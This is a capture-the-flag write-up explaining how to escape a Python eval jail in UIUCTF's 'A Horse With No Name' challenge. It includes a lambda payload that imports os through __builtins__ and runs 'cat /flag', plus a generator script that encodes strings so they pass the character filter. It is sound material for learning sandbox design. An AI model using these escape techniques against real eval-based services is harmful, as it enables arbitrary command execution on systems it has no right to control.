While reading CTF writeups, I came across one about Python jails, where the attacker has to execute Python code through the `eval` function. There is a lot to learn here about the Python language and its libraries. The CTF event was UIUCTF and the challenge name was A Horse With No Name (reference).
You may find this article a little hard to follow because I go deep into Python to explain every aspect of this challenge and every statement that makes up this Python jail.
We are given two files for this challenge. The first one is a Dockerfile.
FROM ubuntu:20.04 as chroot
RUN apt-get update && apt-get install -y python3 && rm -rf /var/lib/apt/lists/*
RUN /usr/sbin/useradd --no-create-home -u 1000 user
COPY flag.txt /
COPY desert.py /home/user/
FROM gcr.io/kctf-docker/challenge@sha256:d884e54146b71baf91603d5b73e563eaffc5a42d494b1e32341a5f76363060fb
COPY --from=chroot / /chroot
COPY nsjail.cfg /home/user/
CMD kctf_setup && \
kctf_drop_privs \
socat \
TCP-LISTEN:1337,reuseaddr,fork \
EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /bin/python3 /home/user/desert.py"
In the Dockerfile, I can see that the image creates a user with UID 1000 (with `--no-create-home`, so no home directory is created for it), and a COPY command copies `flag.txt` to the root directory of the container, so the flag lives at `/flag.txt`. The challenge script `desert.py` is copied to `/home/user/`.
The second file is desert.py, which is the main challenge. Let's take a look at it.
#!/usr/bin/python3
import re
import random
horse = input("Begin your journey: ")
if re.match(r"[a-zA-Z]{4}", horse):
    print("It has begun raining, so you return home.")
elif len(set(re.findall(r"[\W]", horse))) > 4:
    print(set(re.findall(r"[\W]", horse)))
    print("A single horse cannot bear the weight of all those special characters. You return home.")
else:
    discovery = list(eval(compile(horse, "<horse>", "eval").replace(co_names=())))
    random.shuffle(discovery)
    print("You make it through the journey, but are severely dehydrated. This is all you can remember:", discovery)
The Python jail looks minimal, but there is a lot hidden in these few lines. Two libraries are imported, `re` and `random`. Our input is read with Python's built-in `input` function. Then come the conditions, which use the `re` library.
The first condition is `re.match(r"[a-zA-Z]{4}", horse)`. I can try the same thing in my Python interpreter.
11:59:30 root@NeverMind ~ → python3
Python 3.10.5 (main, Jun 8 2022, 09:26:22) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import re
>>> horse = "1234"
>>> re.match(r"[a-zA-Z]{4}", horse)
>>> a = re.match(r"[a-zA-Z]{4}", horse)
>>> print(a)
None
>>> horse = "abcd"
>>> a = re.match(r"[a-zA-Z]{4}", horse)
>>> print(a)
<re.Match object; span=(0, 4), match='abcd'>
>>>
The regex `[a-zA-Z]{4}` checks whether the input starts with four ASCII letters, for example “abcd” or “EFGH”. `re.match` only matches at the beginning of the string: if it finds a match it returns a `re.Match` object, which is truthy, and otherwise it returns `None`, which is falsy. We don't want this condition to be true, because the program is an if-elif-else ladder in which only one branch executes.
We can easily bypass it by starting the input with a digit or a symbol.
09:41:18 root@NeverMind tmp → python3 desert.py
Begin your journey: kingping
It has begun raining, so you return home.
09:42:58 root@NeverMind tmp → python3 desert.py
Begin your journey: 1kingping
Traceback (most recent call last):
File "/tmp/desert.py", line 11, in <module>
discovery = list(eval(compile(horse, "<horse>", "eval").replace(co_names=())))
File "<horse>", line 1
1kingping
^
SyntaxError: invalid decimal literal
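As you can see, when we enter `kingping` the `re` library finds a match and the first branch executes. But when we prepend `1` to it, the condition becomes false and the input reaches the `else` branch (where it fails only because `1kingping` is not valid Python).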
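The first check can be reproduced in isolation. This is a minimal sketch; the helper name `starts_with_four_letters` is my own and does not appear in the challenge.

```python
import re

def starts_with_four_letters(text: str) -> bool:
    """Mirror the first check: re.match only tests the start of the string."""
    return re.match(r"[a-zA-Z]{4}", text) is not None

# Inputs that begin with four ASCII letters are rejected by the challenge.
print(starts_with_four_letters("kingping"))      # True
print(starts_with_four_letters("1kingping"))     # False
print(starts_with_four_letters("(lambda:0)()"))  # False
```

Any payload that opens with a parenthesis therefore passes this check for free.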
The second condition, `len(set(re.findall(r"[\W]", horse))) > 4`, counts non-word characters (`\W`), that is, everything except letters, digits, and the underscore. If there are more than 4 of them, the program exits with a message. The thing to notice is that `set` is being used, so all the matches returned by `re.findall` are collapsed into a set, and a set never holds the same element twice. That means the limit is on distinct characters: we may use at most 4 different special characters, but each of them as many times as we like. Keep one thing in mind: the `_` character does not fall under `\W`.
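To see that only distinct characters count, here is a small sketch of the second check. The helper name `distinct_non_word_chars` is hypothetical; the regex is the one from the challenge.

```python
import re

def distinct_non_word_chars(text: str) -> set:
    """Return the set of distinct characters matched by \\W, as the challenge does."""
    return set(re.findall(r"[\W]", text))

# Repeating a character does not grow the set.
print(sorted(distinct_non_word_chars("((((a.b))))")))  # ['(', ')', '.']

# Underscores are word characters, so dunder names cost nothing.
print(distinct_non_word_chars("__import__"))  # set()
```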
Let's say we somehow bypass both conditions and reach the else block. That is where the evil `eval` function lives, and before it `compile` is called. The compilation mode is `eval` (the third argument), which means our input must be a single expression, which `eval` will then execute. That might be easy, since we can do a lot in a single expression in Python. The most common example is a list comprehension with an if-else condition.
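A quick way to check what `eval` mode accepts is to try compiling a few candidates. This is only a sketch, and `is_single_expression` is a helper name I made up for it.

```python
def is_single_expression(source: str) -> bool:
    """Return True if the source compiles in 'eval' mode, i.e. is one expression."""
    try:
        compile(source, "<demo>", "eval")
    except SyntaxError:
        return False
    return True

# A list comprehension with a conditional is still one expression.
print(is_single_expression("[x * 2 if x % 2 else x for x in range(5)]"))  # True

# Statements such as import or assignment are rejected in this mode.
print(is_single_expression("import os"))  # False
print(is_single_expression("a = 1; a"))   # False
```

This is why the payload later uses `__import__(...)` rather than an `import` statement.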
But notice that the `co_names` of the compiled code is replaced using the `.replace` method. So what is `co_names`?
>>> a = compile("print(10)", '', 'eval')
>>> type(a)
<class 'code'>
>>> a.co_names
('print',)
>>>
Hmm, interesting attribute. `co_names` is the tuple of names used by the code object, and the challenge replaces it with an empty tuple, so any name our top-level expression refers to can no longer be looked up. However, `co_names` does not contain names used inside a nested function, because each function body is compiled into its own code object with its own `co_names`. And we can create a function inside a single expression using the `lambda` keyword.
>>> a = compile("lambda:print(10)", '', 'eval')
>>> a.co_names
()
>>>
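To see where the name went, we can look inside the outer code object's constants. The following is a sketch that uses `abs(-10)` instead of `print(10)` so that the result can be checked; the variable names are my own.

```python
import types

# Compile a lambda in 'eval' mode, as the challenge does with our input.
outer = compile("lambda: abs(-10)", "<demo>", "eval")

# The lambda body is a separate code object stored among the outer constants.
inner = next(c for c in outer.co_consts if isinstance(c, types.CodeType))

print(outer.co_names)  # ()
print(inner.co_names)  # ('abs',)

# Emptying the outer co_names does not touch the inner code object,
# so the lambda still resolves 'abs' when it is called.
stripped = outer.replace(co_names=())
print(eval(stripped)())  # 10
```

Note that `code.replace` only exists on Python 3.8 and later, which matches the target.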
Now we can write our payload as a single expression, with no semicolon `;`. Before we do that, I want to explain something else. If you have studied any programming language thoroughly, you know about the scope of variables. Python has the same concept: if you try to access a variable of a function from outside that function, you get an error. Python actually has 4 scopes:
- Local scope
- Enclosing (or nonlocal) scope
- Global scope
- Builtin scope
The scope to focus on right now is the builtin scope, because it explains our payload. Whenever you run a Python program or an interpreter, this scope is set up automatically for that process. `builtins` is a module that is loaded automatically when Python starts, and it contains all the predefined functions, exceptions, and so on. You are not supposed to write into it; the developer works with the other three scopes. But we can use it in our payload to make it a one-liner.
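Here is a small sketch of the builtin scope in action. It imports the `builtins` module explicitly, because the `__builtins__` name is a CPython implementation detail (it is the module itself in the main script, but may be a plain dict elsewhere). The function name `lookup_demo` is made up for the example.

```python
import builtins

# Names such as len and __import__ live in the builtins module.
print(builtins.len is len)  # True

# __import__ is an ordinary function, so a module can be imported inside an expression.
os_module = builtins.__import__("os")
print(os_module.__name__)  # os

def lookup_demo():
    # 'len' is not local, enclosing, or global here,
    # so Python falls back to the builtin scope.
    return len("abcd")

print(lookup_demo())  # 4
```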
Look at this payload:
(lambda: __builtins__.__import__("os").system("cat /flag"))()
So, we use `__builtins__` here to import the `os` module and call its `system` function in the same expression. All of this happens inside a lambda, which is Python's anonymous function. The trailing pair of parentheses calls the function immediately.
Begin your journey: (lambda: __builtins__.__import__("os").system("cat /flag"))()
{'"', ':', ')', '.', ' ', '/', '('}
A single horse cannot bear the weight of all those special characters. You return home.
So the second condition triggers when we don't want it to. The payload contains 7 distinct special characters, and we are allowed at most 4 (the `_` character is not counted).
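Okay, so we cannot drop the opening and closing parentheses `()`, and the same goes for the colon `:`. We also need the dot `.` for attribute access. We can get rid of the space ` `, and we must remove the quote `"` and the slash `/` as well. The characters left to work with are then:
( ) : .
To get rid of the quotes, we can take characters from the `__name__` attribute of any built-in function, using `__getitem__` instead of square brackets.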
>>> open.__name__.__getitem__(0)
'o'
>>> open.__name__.__getitem__(1)
'p'
>>> open.__name__.__getitem__(2)
'e'
>>> open.__name__.__getitem__(3)
'n'
>>>
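Single characters can then be glued together with `__add__`, which avoids the `+` sign. A minimal sketch that builds the string `os` this way and checks which special characters the expression costs (the variable names are my own):

```python
import re

# Pick single characters out of builtin function names, without quotes or brackets.
o = open.__name__.__getitem__(0)
s = set.__name__.__getitem__(0)

# Concatenate with __add__ instead of '+', which would be another special character.
module_name = o.__add__(s)
print(module_name)  # os

# The same thing as one expression uses only three distinct special characters.
expr = "open.__name__.__getitem__(0).__add__(set.__name__.__getitem__(0))"
print(sorted(set(re.findall(r"[\W]", expr))))  # ['(', ')', '.']
print(eval(expr))  # os
```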
This way you can get any character present in a function's name and use it where you need it. Since this adds no new special characters, we can use it in our payload. To generate whole strings this way, you can use the following script.
def generator(cmd):
    # Make sure to use the same python version as the target when building the mapping
    # (because the __doc__ might change across versions)
    # Target uses Python 3.8.10
    mapping = {
        'o': "open.__name__.__getitem__(0)",
        's': "set.__name__.__getitem__(0)",
        'c': "chr.__name__.__getitem__(0)",
        'h': "hash.__name__.__getitem__(0)",
        'e': "eval.__name__.__getitem__(0)",
        'a': "abs.__name__.__getitem__(0)",
        'd': "divmod.__name__.__getitem__(0)",
        'f': "float.__name__.__getitem__(0)",
        'l': "list.__name__.__getitem__(0)",
        'g': "globals.__name__.__getitem__(0)",
        't': "type.__name__.__getitem__(0)",
        'x': "hex.__name__.__getitem__(2)",
        ' ': "str(hash).__getitem__(9)",
        '-': "str(hash).__getitem__(6)",
        '.': "hash.__doc__.__getitem__(151)",
        '1': "dict.__doc__.__getitem__(361)",
        '/': "divmod.__doc__.__getitem__(20)",
    }
    # Sanity check: every expression must evaluate to the character it encodes
    for k, v in mapping.items():
        assert k == eval(v)
    payload = ''
    for ch in cmd:
        encoded_ch = mapping[ch]
        if len(payload) == 0:
            payload = encoded_ch
        else:
            # Concatenate with __add__ so that no '+' character is needed
            payload += f".__add__({encoded_ch})"
    assert eval(payload) == cmd
    return payload
horse = f"(lambda:__builtins__.__import__({generator('os')}).system({generator('cat /flag.txt')}))()"
print(horse)
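Before sending a payload, it can be checked locally against the three obstacles without executing it. This is a rough sketch: `jail_verdict` and its messages are my own, and the sample payload only imports `os`, using characters taken from function names so that it does not depend on the Python version.

```python
import re

def jail_verdict(horse: str) -> str:
    """Replay the checks of desert.py on a candidate input, without running it."""
    if re.match(r"[a-zA-Z]{4}", horse):
        return "rejected: starts with four letters"
    if len(set(re.findall(r"[\W]", horse))) > 4:
        return "rejected: too many distinct special characters"
    code = compile(horse, "<horse>", "eval")
    if code.co_names:
        # These names would be erased by .replace(co_names=())
        return "broken: top-level names would be erased"
    return "accepted"

sample = (
    "(lambda:__builtins__.__import__("
    "open.__name__.__getitem__(0).__add__(set.__name__.__getitem__(0))"
    "))()"
)
print(jail_verdict(sample))        # accepted
print(jail_verdict("(print)(1)"))  # broken: top-level names would be erased
print(jail_verdict('(lambda: __builtins__.__import__("os").system("cat /flag"))()'))
# rejected: too many distinct special characters
```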
And that's how you bypass a Python jail.